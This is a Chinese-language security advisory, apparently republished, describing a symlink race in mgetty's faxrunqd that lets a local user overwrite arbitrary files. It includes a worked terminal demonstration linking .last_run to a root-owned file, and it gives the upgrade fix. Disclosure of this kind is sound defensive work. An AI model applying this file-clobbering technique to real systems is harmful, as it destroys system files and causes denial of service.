受影响系统:
mgetty 1.1.21以及更低版本
- Linux redhat 6.2以及更低版本
- Linux-Mandrake 7.1 以及更低版本
- 其他使用有问题mgetty的unix系统
不受影响系统:
mgetty 1.1.22
描述:
mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务。
在执行时,该程序会在/var/spool/outgoing/目录下创建一个.last_run文件,这个目录是任何人可写的。在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在或是链接文件,因此攻击者可能覆盖任意系统文件,造成拒绝服务攻击。
<* 来源: Stan Bubrouski (satan@fastdial.net)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
建议:
mgetty 1.1.22已经解决了这个问题,您可以在下列地址下载:http://alpha.greenie.net/mgetty/
关键词标签:拒绝服务攻击,Linux,f
相关阅读
热门文章
提示dns服务错误怎么办 dns错误问题多种解决方法
“无法浏览网页” 十招解决疑难杂症
路由器无线不能上网等故障排除
解决VPN路由设置不能访问外网的问题
人气排行 解决VPN路由设置不能访问外网的问题 登录SSH服务器失败问题的分析及解决 光纤上网 路由器设置页面进不去怎么办 核心交换机故障现象及解决办法 无线网卡连接不上怎么办_无线网卡连接不上解决方法 路由设置不当 导致VPN无法访问外网 提示dns服务错误怎么办 dns错误问题多种解决方法 彻底避免环路问题 正确配置交换机步骤
查看所有3条评论>>